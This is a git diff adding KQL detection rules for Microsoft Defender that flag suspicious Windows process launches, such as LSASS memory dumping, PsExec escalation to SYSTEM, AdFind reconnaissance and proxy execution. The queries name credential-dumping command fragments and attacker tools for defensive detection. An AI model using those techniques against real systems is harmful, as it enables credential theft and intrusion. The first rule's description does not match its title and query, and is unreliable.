diff --git a/KQL/rules/windows/process_creation/privilege_escalation_via_named_pipe_impersonation.kql b/KQL/rules/windows/process_creation/privilege_escalation_via_named_pipe_impersonation.kql
new file mode 100644
index 00000000..1f5d0adf
--- /dev/null
+++ b/KQL/rules/windows/process_creation/privilege_escalation_via_named_pipe_impersonation.kql
@@ -0,0 +1,12 @@
+// Title: Privilege Escalation via Named Pipe Impersonation
+// Author: Tim Rauch, Elastic (idea)
+// Date: 2022-09-27
+// Level: high
+// Description: Detects a remote file copy attempt to a hidden network share. This may indicate lateral movement or data staging activity.
+// MITRE Tactic: Lateral Movement
+// Tags: attack.lateral-movement, attack.t1021
+// False Positives:
+//   - Other programs that cause these patterns (please report)
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "echo" and ProcessCommandLine contains ">" and ProcessCommandLine contains "\\\\.\\pipe\\") and ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe") or (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "PowerShell.EXE")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/procdump_execution.kql b/KQL/rules/windows/process_creation/procdump_execution.kql
new file mode 100644
index 00000000..8ebc8682
--- /dev/null
+++ b/KQL/rules/windows/process_creation/procdump_execution.kql
@@ -0,0 +1,12 @@
+// Title: Procdump Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-08-16
+// Level: medium
+// Description: Detects usage of the SysInternals Procdump utility
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036, attack.t1003.001, attack.credential-access
+// False Positives:
+//   - Legitimate use of procdump by a developer or administrator
+
+DeviceProcessEvents
+| where FolderPath endswith "\\procdump.exe" or FolderPath endswith "\\procdump64.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/process_access_via_trolleyexpress_exclusion.kql b/KQL/rules/windows/process_creation/process_access_via_trolleyexpress_exclusion.kql
new file mode 100644
index 00000000..bfd8847d
--- /dev/null
+++ b/KQL/rules/windows/process_creation/process_access_via_trolleyexpress_exclusion.kql
@@ -0,0 +1,10 @@
+// Title: Process Access via TrolleyExpress Exclusion
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-02-10
+// Level: high
+// Description: Detects a possible process memory dump that uses the white-listed Citrix TrolleyExpress.exe filename as a way to dump the lsass process memory
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.011, attack.credential-access, attack.t1003.001
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "\\TrolleyExpress 7" or ProcessCommandLine contains "\\TrolleyExpress 8" or ProcessCommandLine contains "\\TrolleyExpress 9" or ProcessCommandLine contains "\\TrolleyExpress.exe 7" or ProcessCommandLine contains "\\TrolleyExpress.exe 8" or ProcessCommandLine contains "\\TrolleyExpress.exe 9" or ProcessCommandLine contains "\\TrolleyExpress.exe -ma ") or (FolderPath endswith "\\TrolleyExpress.exe" and (not((isnull(ProcessVersionInfoOriginalFileName) or ProcessVersionInfoOriginalFileName contains "CtxInstall"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/process_creation_using_sysnative_folder.kql b/KQL/rules/windows/process_creation/process_creation_using_sysnative_folder.kql
new file mode 100644
index 00000000..2991b840
--- /dev/null
+++ b/KQL/rules/windows/process_creation/process_creation_using_sysnative_folder.kql
@@ -0,0 +1,10 @@
+// Title: Process Creation Using Sysnative Folder
+// Author: Max Altgelt (Nextron Systems)
+// Date: 2022-08-23
+// Level: medium
+// Description: Detects process creation events that use the Sysnative folder (common for CobaltStrike spawns)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1055
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains ":\\Windows\\Sysnative\\" or FolderPath contains ":\\Windows\\Sysnative\\") and (not((ProcessCommandLine contains "install" and (FolderPath contains "C:\\Windows\\Microsoft.NET\\Framework64\\v" or FolderPath contains "C:\\Windows\\Microsoft.NET\\Framework\\v" or FolderPath contains "C:\\Windows\\Microsoft.NET\\FrameworkArm\\v" or FolderPath contains "C:\\Windows\\Microsoft.NET\\FrameworkArm64\\v") and FolderPath endswith "\\ngen.exe"))) and (not((ProcessCommandLine contains "\"C:\\Windows\\sysnative\\cmd.exe\"" and ProcessCommandLine contains "\\xampp\\" and ProcessCommandLine contains "\\catalina_start.bat")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/process_execution_from_a_potentially_suspicious_folder.kql b/KQL/rules/windows/process_creation/process_execution_from_a_potentially_suspicious_folder.kql
new file mode 100644
index 00000000..1832f3e8
--- /dev/null
+++ b/KQL/rules/windows/process_creation/process_execution_from_a_potentially_suspicious_folder.kql
@@ -0,0 +1,10 @@
+// Title: Process Execution From A Potentially Suspicious Folder
+// Author: Florian Roth (Nextron Systems), Tim Shelton
+// Date: 2019-01-16
+// Level: high
+// Description: Detects a potentially suspicious execution from an uncommon folder.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036
+
+DeviceProcessEvents
+| where (FolderPath contains ":\\Perflogs\\" or FolderPath contains ":\\Users\\All Users\\" or FolderPath contains ":\\Users\\Default\\" or FolderPath contains ":\\Users\\NetworkService\\" or FolderPath contains ":\\Windows\\addins\\" or FolderPath contains ":\\Windows\\debug\\" or FolderPath contains ":\\Windows\\Fonts\\" or FolderPath contains ":\\Windows\\Help\\" or FolderPath contains ":\\Windows\\IME\\" or FolderPath contains ":\\Windows\\Media\\" or FolderPath contains ":\\Windows\\repair\\" or FolderPath contains ":\\Windows\\security\\" or FolderPath contains ":\\Windows\\System32\\Tasks\\" or FolderPath contains ":\\Windows\\Tasks\\" or FolderPath contains "$Recycle.bin" or FolderPath contains "\\config\\systemprofile\\" or FolderPath contains "\\Intel\\Logs\\" or FolderPath contains "\\RSA\\MachineKeys\\") and (not(((FolderPath endswith "\\CitrixReceiverUpdater.exe" and FolderPath startswith "C:\\Windows\\SysWOW64\\config\\systemprofile\\Citrix\\UpdaterBinaries\\") or FolderPath startswith "C:\\Users\\Public\\IBM\\ClientSolutions\\Start_Programs\\")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/process_launched_without_image_name.kql b/KQL/rules/windows/process_creation/process_launched_without_image_name.kql
new file mode 100644
index 00000000..25656e9f
--- /dev/null
+++ b/KQL/rules/windows/process_creation/process_launched_without_image_name.kql
@@ -0,0 +1,12 @@
+// Title: Process Launched Without Image Name
+// Author: Matt Anderson (Huntress)
+// Date: 2024-07-23
+// Level: medium
+// Description: Detect the use of processes with no name (".exe"), which can be used to evade Image-based detections.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+// False Positives:
+//   - Rare legitimate software.
+
+DeviceProcessEvents
+| where FolderPath endswith "\\.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/process_memory_dump_via_comsvcs_dll.kql b/KQL/rules/windows/process_creation/process_memory_dump_via_comsvcs_dll.kql
new file mode 100644
index 00000000..b9b7a90d
--- /dev/null
+++ b/KQL/rules/windows/process_creation/process_memory_dump_via_comsvcs_dll.kql
@@ -0,0 +1,12 @@
+// Title: Process Memory Dump Via Comsvcs.DLL
+// Author: Florian Roth (Nextron Systems), Modexp, Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2020-02-18
+// Level: high
+// Description: Detects a process memory dump via "comsvcs.dll" using rundll32, covering multiple different techniques (ordinal, minidump function, etc.)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.credential-access, attack.t1036, attack.t1003.001, car.2013-05-009
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE" or ProcessCommandLine contains "rundll32") and ((ProcessCommandLine contains "#-" or ProcessCommandLine contains "#+" or ProcessCommandLine contains "#24" or ProcessCommandLine contains "24 " or ProcessCommandLine contains "MiniDump" or ProcessCommandLine contains "#65560") and (ProcessCommandLine contains "comsvcs" and ProcessCommandLine contains "full"))) or ((ProcessCommandLine contains " #" or ProcessCommandLine contains ",#" or ProcessCommandLine contains ", #" or ProcessCommandLine contains "\"#") and (ProcessCommandLine contains "24" and ProcessCommandLine contains "comsvcs" and ProcessCommandLine contains "full"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/process_memory_dump_via_dotnet_dump.kql b/KQL/rules/windows/process_creation/process_memory_dump_via_dotnet_dump.kql
new file mode 100644
index 00000000..8e9c3f19
--- /dev/null
+++ b/KQL/rules/windows/process_creation/process_memory_dump_via_dotnet_dump.kql
@@ -0,0 +1,12 @@
+// Title: Process Memory Dump Via Dotnet-Dump
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-03-14
+// Level: medium
+// Description: Detects the execution of "dotnet-dump" with the "collect" flag. The execution could indicate potential process dumping of critical processes such as LSASS.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+// False Positives:
+//   - Process dumping is the expected behavior of the tool. So false positives are expected in legitimate usage. The PID/Process Name of the process being dumped needs to be investigated
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "collect" and (FolderPath endswith "\\dotnet-dump.exe" or ProcessVersionInfoOriginalFileName =~ "dotnet-dump.dll")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/process_memory_dump_via_rdrleakdiag_exe.kql b/KQL/rules/windows/process_creation/process_memory_dump_via_rdrleakdiag_exe.kql
new file mode 100644
index 00000000..bac09fa4
--- /dev/null
+++ b/KQL/rules/windows/process_creation/process_memory_dump_via_rdrleakdiag_exe.kql
@@ -0,0 +1,12 @@
+// Title: Process Memory Dump via RdrLeakDiag.EXE
+// Author: Cedric MAURUGEON, Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2021-09-24
+// Level: high
+// Description: Detects the use of the Microsoft Windows Resource Leak Diagnostic tool "rdrleakdiag.exe" to dump process memory
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.001
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-memdmp" or ProcessCommandLine contains "/memdmp" or ProcessCommandLine contains "–memdmp" or ProcessCommandLine contains "—memdmp" or ProcessCommandLine contains "―memdmp" or ProcessCommandLine contains "fullmemdmp") and (ProcessCommandLine contains " -o " or ProcessCommandLine contains " /o " or ProcessCommandLine contains " –o " or ProcessCommandLine contains " —o " or ProcessCommandLine contains " ―o " or ProcessCommandLine contains " -p " or ProcessCommandLine contains " /p " or ProcessCommandLine contains " –p " or ProcessCommandLine contains " —p " or ProcessCommandLine contains " ―p ") and (FolderPath endswith "\\rdrleakdiag.exe" or ProcessVersionInfoOriginalFileName =~ "RdrLeakDiag.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/process_proxy_execution_via_squirrel_exe.kql b/KQL/rules/windows/process_creation/process_proxy_execution_via_squirrel_exe.kql
new file mode 100644
index 00000000..272776a6
--- /dev/null
+++ b/KQL/rules/windows/process_creation/process_proxy_execution_via_squirrel_exe.kql
@@ -0,0 +1,12 @@
+// Title: Process Proxy Execution Via Squirrel.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems), Karneades / Markus Neis, Jonhnathan Ribeiro, oscd.community
+// Date: 2022-06-09
+// Level: medium
+// Description: Detects the usage of the "Squirrel.exe" binary to execute arbitrary processes. This binary is part of multiple Electron based software installations (Slack, Teams, Discord, etc.)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1218
+// False Positives:
+//   - Expected FP with some Electron based applications such as (1Clipboard, Beaker Browser, Caret, Discord, GitHub Desktop, etc.)
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "--processStart" or ProcessCommandLine contains "--processStartAndWait" or ProcessCommandLine contains "--createShortcut") and (FolderPath endswith "\\squirrel.exe" or FolderPath endswith "\\update.exe")) and (not((((ProcessCommandLine contains "--createShortcut" or ProcessCommandLine contains "--processStart") and (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\AppData\\Local\\Discord\\Update.exe" and ProcessCommandLine contains "Discord.exe")) or ((ProcessCommandLine contains "--createShortcut" or ProcessCommandLine contains "--processStartAndWait") and (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\AppData\\Local\\GitHubDesktop\\Update.exe" and ProcessCommandLine contains "GitHubDesktop.exe")) or ((ProcessCommandLine contains "--processStart" or ProcessCommandLine contains "--createShortcut") and (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\AppData\\Local\\Microsoft\\Teams\\Update.exe" and ProcessCommandLine contains "Teams.exe")) or ((ProcessCommandLine contains "--processStart" or ProcessCommandLine contains "--createShortcut") and (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\AppData\\Local\\yammerdesktop\\Update.exe" and ProcessCommandLine contains "Yammer.exe")))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/process_reconnaissance_via_wmic_exe.kql b/KQL/rules/windows/process_creation/process_reconnaissance_via_wmic_exe.kql
new file mode 100644
index 00000000..2307fbea
--- /dev/null
+++ b/KQL/rules/windows/process_creation/process_reconnaissance_via_wmic_exe.kql
@@ -0,0 +1,10 @@
+// Title: Process Reconnaissance Via Wmic.EXE
+// Author: frack113
+// Date: 2022-01-01
+// Level: medium
+// Description: Detects the execution of "wmic" with the "process" flag, which adversary might use to list processes running on the compromised host or list installed software hotfixes and patches.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1047
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "process" and (FolderPath endswith "\\WMIC.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")) and (not((ProcessCommandLine contains "call" and ProcessCommandLine contains "create")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/proxy_execution_via_vshadow.kql b/KQL/rules/windows/process_creation/proxy_execution_via_vshadow.kql
new file mode 100644
index 00000000..4623d3d3
--- /dev/null
+++ b/KQL/rules/windows/process_creation/proxy_execution_via_vshadow.kql
@@ -0,0 +1,15 @@
+// Title: Proxy Execution via Vshadow
+// Author: David Faiss
+// Date: 2025-05-26
+// Level: medium
+// Description: Detects the invocation of vshadow.exe with the -exec parameter that executes a specified script or command after the shadow copies are created but before the VShadow tool exits.
+// VShadow is a command-line tool that you can use to create and manage volume shadow copies. While legitimate backup or administrative scripts may use this flag,
+// attackers can leverage this parameter to proxy the execution of malware.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1202
+// False Positives:
+//   - System backup or administrator tools
+//   - Legitimate administrative scripts
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "-exec" and (FolderPath endswith "\\vshadow.exe" or ProcessVersionInfoOriginalFileName =~ "vshadow.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/proxy_execution_via_wuauclt_exe.kql b/KQL/rules/windows/process_creation/proxy_execution_via_wuauclt_exe.kql
new file mode 100644
index 00000000..91353a20
--- /dev/null
+++ b/KQL/rules/windows/process_creation/proxy_execution_via_wuauclt_exe.kql
@@ -0,0 +1,10 @@
+// Title: Proxy Execution Via Wuauclt.EXE
+// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), Florian Roth (Nextron Systems), Sreeman, FPT.EagleEye Team
+// Date: 2020-10-12
+// Level: high
+// Description: Detects the use of the Windows Update Client binary (wuauclt.exe) for proxy execution.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218, attack.execution
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "UpdateDeploymentProvider" and ProcessCommandLine contains "RunHandlerComServer") and (FolderPath endswith "\\wuauclt.exe" or ProcessVersionInfoOriginalFileName =~ "wuauclt.exe")) and (not((ProcessCommandLine contains " /UpdateDeploymentProvider UpdateDeploymentProvider.dll " or (ProcessCommandLine contains ":\\Windows\\UUS\\Packages\\Preview\\amd64\\updatedeploy.dll /ClassId" or ProcessCommandLine contains ":\\Windows\\UUS\\amd64\\UpdateDeploy.dll /ClassId") or (ProcessCommandLine contains ":\\Windows\\WinSxS\\" and ProcessCommandLine contains "\\UpdateDeploy.dll /ClassId ") or ProcessCommandLine contains " wuaueng.dll ")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/psexec_execution.kql b/KQL/rules/windows/process_creation/psexec_execution.kql
new file mode 100644
index 00000000..751630a8
--- /dev/null
+++ b/KQL/rules/windows/process_creation/psexec_execution.kql
@@ -0,0 +1,12 @@
+// Title: Psexec Execution
+// Author: omkar72
+// Date: 2020-10-30
+// Level: medium
+// Description: Detects user accept agreement execution in psexec commandline
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.lateral-movement, attack.t1569, attack.t1021
+// False Positives:
+//   - Administrative scripts.
+
+DeviceProcessEvents
+| where FolderPath endswith "\\psexec.exe" or ProcessVersionInfoOriginalFileName =~ "psexec.c"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/psexec_paexec_escalation_to_local_system.kql b/KQL/rules/windows/process_creation/psexec_paexec_escalation_to_local_system.kql
new file mode 100644
index 00000000..b822e5f9
--- /dev/null
+++ b/KQL/rules/windows/process_creation/psexec_paexec_escalation_to_local_system.kql
@@ -0,0 +1,13 @@
+// Title: PsExec/PAExec Escalation to LOCAL SYSTEM
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2021-11-23
+// Level: high
+// Description: Detects suspicious commandline flags used by PsExec and PAExec to escalate a command line to LOCAL_SYSTEM rights
+// MITRE Tactic: Resource Development
+// Tags: attack.resource-development, attack.t1587.001
+// False Positives:
+//   - Admins that use PsExec or PAExec to escalate to the SYSTEM account for maintenance purposes (rare)
+//   - Users that debug Microsoft Intune issues using the commands mentioned in the official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "psexec" or ProcessCommandLine contains "paexec" or ProcessCommandLine contains "accepteula") and (ProcessCommandLine contains " -s cmd" or ProcessCommandLine contains " /s cmd" or ProcessCommandLine contains " –s cmd" or ProcessCommandLine contains " —s cmd" or ProcessCommandLine contains " ―s cmd" or ProcessCommandLine contains " -s -i cmd" or ProcessCommandLine contains " -s /i cmd" or ProcessCommandLine contains " -s –i cmd" or ProcessCommandLine contains " -s —i cmd" or ProcessCommandLine contains " -s ―i cmd" or ProcessCommandLine contains " /s -i cmd" or ProcessCommandLine contains " /s /i cmd" or ProcessCommandLine contains " /s –i cmd" or ProcessCommandLine contains " /s —i cmd" or ProcessCommandLine contains " /s ―i cmd" or ProcessCommandLine contains " –s -i cmd" or ProcessCommandLine contains " –s /i cmd" or ProcessCommandLine contains " –s –i cmd" or ProcessCommandLine contains " –s —i cmd" or ProcessCommandLine contains " –s ―i cmd" or ProcessCommandLine contains " —s -i cmd" or ProcessCommandLine contains " —s /i cmd" or ProcessCommandLine contains " —s –i cmd" or ProcessCommandLine contains " —s —i cmd" or ProcessCommandLine contains " —s ―i cmd" or ProcessCommandLine contains " ―s -i cmd" or ProcessCommandLine contains " ―s /i cmd" or ProcessCommandLine contains " ―s –i cmd" or ProcessCommandLine contains " ―s —i cmd" or ProcessCommandLine contains " ―s ―i cmd" or ProcessCommandLine contains " -i -s cmd" or ProcessCommandLine contains " -i /s cmd" or ProcessCommandLine contains " -i –s cmd" or ProcessCommandLine contains " -i —s cmd" or ProcessCommandLine contains " -i ―s cmd" or ProcessCommandLine contains " /i -s cmd" or ProcessCommandLine contains " /i /s cmd" or ProcessCommandLine contains " /i –s cmd" or ProcessCommandLine contains " /i —s cmd" or ProcessCommandLine contains " /i ―s cmd" or ProcessCommandLine contains " –i -s cmd" or ProcessCommandLine contains " –i /s cmd" or ProcessCommandLine contains " –i –s cmd" or ProcessCommandLine contains " –i —s cmd" or ProcessCommandLine contains " –i ―s cmd" or ProcessCommandLine contains " —i -s cmd" or ProcessCommandLine contains " —i /s cmd" or ProcessCommandLine contains " —i –s cmd" or ProcessCommandLine contains " —i —s cmd" or ProcessCommandLine contains " —i ―s cmd" or ProcessCommandLine contains " ―i -s cmd" or ProcessCommandLine contains " ―i /s cmd" or ProcessCommandLine contains " ―i –s cmd" or ProcessCommandLine contains " ―i —s cmd" or ProcessCommandLine contains " ―i ―s cmd" or ProcessCommandLine contains " -s pwsh" or ProcessCommandLine contains " /s pwsh" or ProcessCommandLine contains " –s pwsh" or ProcessCommandLine contains " —s pwsh" or ProcessCommandLine contains " ―s pwsh" or ProcessCommandLine contains " -s -i pwsh" or ProcessCommandLine contains " -s /i pwsh" or ProcessCommandLine contains " -s –i pwsh" or ProcessCommandLine contains " -s —i pwsh" or ProcessCommandLine contains " -s ―i pwsh" or ProcessCommandLine contains " /s -i pwsh" or ProcessCommandLine contains " /s /i pwsh" or ProcessCommandLine contains " /s –i pwsh" or ProcessCommandLine contains " /s —i pwsh" or ProcessCommandLine contains " /s ―i pwsh" or ProcessCommandLine contains " –s -i pwsh" or ProcessCommandLine contains " –s /i pwsh" or ProcessCommandLine contains " –s –i pwsh" or ProcessCommandLine contains " –s —i pwsh" or ProcessCommandLine contains " –s ―i pwsh" or ProcessCommandLine contains " —s -i pwsh" or ProcessCommandLine contains " —s /i pwsh" or ProcessCommandLine contains " —s –i pwsh" or ProcessCommandLine contains " —s —i pwsh" or ProcessCommandLine contains " —s ―i pwsh" or ProcessCommandLine contains " ―s -i pwsh" or ProcessCommandLine contains " ―s /i pwsh" or ProcessCommandLine contains " ―s –i pwsh" or ProcessCommandLine contains " ―s —i pwsh" or ProcessCommandLine contains " ―s ―i pwsh" or ProcessCommandLine contains " -i -s pwsh" or ProcessCommandLine contains " -i /s pwsh" or ProcessCommandLine contains " -i –s pwsh" or ProcessCommandLine contains " -i —s pwsh" or ProcessCommandLine contains " -i ―s pwsh" or ProcessCommandLine contains " /i -s pwsh" or ProcessCommandLine contains " /i /s pwsh" or ProcessCommandLine contains " /i –s pwsh" or ProcessCommandLine contains " /i —s pwsh" or ProcessCommandLine contains " /i ―s pwsh" or ProcessCommandLine contains " –i -s pwsh" or ProcessCommandLine contains " –i /s pwsh" or ProcessCommandLine contains " –i –s pwsh" or ProcessCommandLine contains " –i —s pwsh" or ProcessCommandLine contains " –i ―s pwsh" or ProcessCommandLine contains " —i -s pwsh" or ProcessCommandLine contains " —i /s pwsh" or ProcessCommandLine contains " —i –s pwsh" or ProcessCommandLine contains " —i —s pwsh" or ProcessCommandLine contains " —i ―s pwsh" or ProcessCommandLine contains " ―i -s pwsh" or ProcessCommandLine contains " ―i /s pwsh" or ProcessCommandLine contains " ―i –s pwsh" or ProcessCommandLine contains " ―i —s pwsh" or ProcessCommandLine contains " ―i ―s pwsh" or ProcessCommandLine contains " -s powershell" or ProcessCommandLine contains " /s powershell" or ProcessCommandLine contains " –s powershell" or ProcessCommandLine contains " —s powershell" or ProcessCommandLine contains " ―s powershell" or ProcessCommandLine contains " -s -i powershell" or ProcessCommandLine contains " -s /i powershell" or ProcessCommandLine contains " -s –i powershell" or ProcessCommandLine contains " -s —i powershell" or ProcessCommandLine contains " -s ―i powershell" or ProcessCommandLine contains " /s -i powershell" or ProcessCommandLine contains " /s /i powershell" or ProcessCommandLine contains " /s –i powershell" or ProcessCommandLine contains " /s —i powershell" or ProcessCommandLine contains " /s ―i powershell" or ProcessCommandLine contains " –s -i powershell" or ProcessCommandLine contains " –s /i powershell" or ProcessCommandLine contains " –s –i powershell" or ProcessCommandLine contains " –s —i powershell" or ProcessCommandLine contains " –s ―i powershell" or ProcessCommandLine contains " —s -i powershell" or ProcessCommandLine contains " —s /i powershell" or ProcessCommandLine contains " —s –i powershell" or ProcessCommandLine contains " —s —i powershell" or ProcessCommandLine contains " —s ―i powershell" or ProcessCommandLine contains " ―s -i powershell" or ProcessCommandLine contains " ―s /i powershell" or ProcessCommandLine contains " ―s –i powershell" or ProcessCommandLine contains " ―s —i powershell" or ProcessCommandLine contains " ―s ―i powershell" or ProcessCommandLine contains " -i -s powershell" or ProcessCommandLine contains " -i /s powershell" or ProcessCommandLine contains " -i –s powershell" or ProcessCommandLine contains " -i —s powershell" or ProcessCommandLine contains " -i ―s powershell" or ProcessCommandLine contains " /i -s powershell" or ProcessCommandLine contains " /i /s powershell" or ProcessCommandLine contains " /i –s powershell" or ProcessCommandLine contains " /i —s powershell" or ProcessCommandLine contains " /i ―s powershell" or ProcessCommandLine contains " –i -s powershell" or ProcessCommandLine contains " –i /s powershell" or ProcessCommandLine contains " –i –s powershell" or ProcessCommandLine contains " –i —s powershell" or ProcessCommandLine contains " –i ―s powershell" or ProcessCommandLine contains " —i -s powershell" or ProcessCommandLine contains " —i /s powershell" or ProcessCommandLine contains " —i –s powershell" or ProcessCommandLine contains " —i —s powershell" or ProcessCommandLine contains " —i ―s powershell" or ProcessCommandLine contains " ―i -s powershell" or ProcessCommandLine contains " ―i /s powershell" or ProcessCommandLine contains " ―i –s powershell" or ProcessCommandLine contains " ―i —s powershell" or ProcessCommandLine contains " ―i ―s powershell")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/psexec_service_child_process_execution_as_local_system.kql b/KQL/rules/windows/process_creation/psexec_service_child_process_execution_as_local_system.kql
new file mode 100644
index 00000000..66caf128
--- /dev/null
+++ b/KQL/rules/windows/process_creation/psexec_service_child_process_execution_as_local_system.kql
@@ -0,0 +1,12 @@
+// Title: PsExec Service Child Process Execution as LOCAL SYSTEM
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-07-21
+// Level: high
+// Description: Detects suspicious launch of the PSEXESVC service on this system and a sub process run as LOCAL_SYSTEM (-s), which means that someone remotely started a command on this system running it with highest privileges and not only the privileges of the login user account (e.g. the administrator account)
+// MITRE Tactic: Execution
+// Tags: attack.execution
+// False Positives:
+//   - Users that debug Microsoft Intune issues using the commands mentioned in the official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath =~ "C:\\Windows\\PSEXESVC.exe" and (AccountName contains "AUTHORI" or AccountName contains "AUTORI")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/psexec_service_execution.kql b/KQL/rules/windows/process_creation/psexec_service_execution.kql
new file mode 100644
index 00000000..0286c4be
--- /dev/null
+++ b/KQL/rules/windows/process_creation/psexec_service_execution.kql
@@ -0,0 +1,12 @@
+// Title: PsExec Service Execution
+// Author: Thomas Patzke, Romaissa Adjailia, Florian Roth (Nextron Systems)
+// Date: 2017-06-12
+// Level: medium
+// Description: Detects launch of the PSEXESVC service, which means that this system was the target of a psexec remote execution
+// MITRE Tactic: Execution
+// Tags: attack.execution
+// False Positives:
+//   - Legitimate administrative tasks
+
+DeviceProcessEvents
+| where FolderPath =~ "C:\\Windows\\PSEXESVC.exe" or ProcessVersionInfoOriginalFileName =~ "psexesvc.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/pua_3proxy_execution.kql b/KQL/rules/windows/process_creation/pua_3proxy_execution.kql
new file mode 100644
index 00000000..0188a5f2
--- /dev/null
+++ b/KQL/rules/windows/process_creation/pua_3proxy_execution.kql
@@ -0,0 +1,12 @@
+// Title: PUA - 3Proxy Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-09-13
+// Level: high
+// Description: Detects the use of 3proxy, a tiny free proxy server
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1572
+// False Positives:
+//   - Administrative activity
+
+DeviceProcessEvents
+| where FolderPath endswith "\\3proxy.exe" or ProcessCommandLine contains ".exe -i127.0.0.1 -p" or ProcessVersionInfoFileDescription =~ "3proxy - tiny proxy server"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/pua_adfind_suspicious_execution.kql b/KQL/rules/windows/process_creation/pua_adfind_suspicious_execution.kql
new file mode 100644
index 00000000..221c1c19
--- /dev/null
+++ b/KQL/rules/windows/process_creation/pua_adfind_suspicious_execution.kql
@@ -0,0 +1,12 @@
+// Title: PUA - AdFind Suspicious Execution
+// Author: Janantha Marasinghe (https://github.com/blueteam0ps), FPT.EagleEye Team, omkar72, oscd.community
+// Date: 2021-02-02
+// Level: high
+// Description: Detects AdFind execution with common flags seen used during attacks
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1018, attack.t1087.002, attack.t1482, attack.t1069.002, stp.1u
+// False Positives:
+//   - Legitimate admin activity
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "domainlist" or ProcessCommandLine contains "trustdmp" or ProcessCommandLine contains "dcmodes" or ProcessCommandLine contains "adinfo" or ProcessCommandLine contains "-sc dclist" or ProcessCommandLine contains "computer_pwdnotreqd" or ProcessCommandLine contains "objectcategory=" or ProcessCommandLine contains "-subnets -f" or ProcessCommandLine contains "name=\"Domain Admins\"" or ProcessCommandLine contains "-sc u:" or ProcessCommandLine contains "domainncs" or ProcessCommandLine contains "dompol" or ProcessCommandLine contains " oudmp " or ProcessCommandLine contains "subnetdmp" or ProcessCommandLine contains "gpodmp" or ProcessCommandLine contains "fspdmp" or ProcessCommandLine contains "users_noexpire" or ProcessCommandLine contains "computers_active" or ProcessCommandLine contains "computers_pwdnotreqd"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/pua_adidnsdump_execution.kql b/KQL/rules/windows/process_creation/pua_adidnsdump_execution.kql
new file mode 100644
index 00000000..7d6c2ec6
--- /dev/null
+++ b/KQL/rules/windows/process_creation/pua_adidnsdump_execution.kql
@@ -0,0 +1,11 @@
+// Title: PUA - Adidnsdump Execution
+// Author: frack113
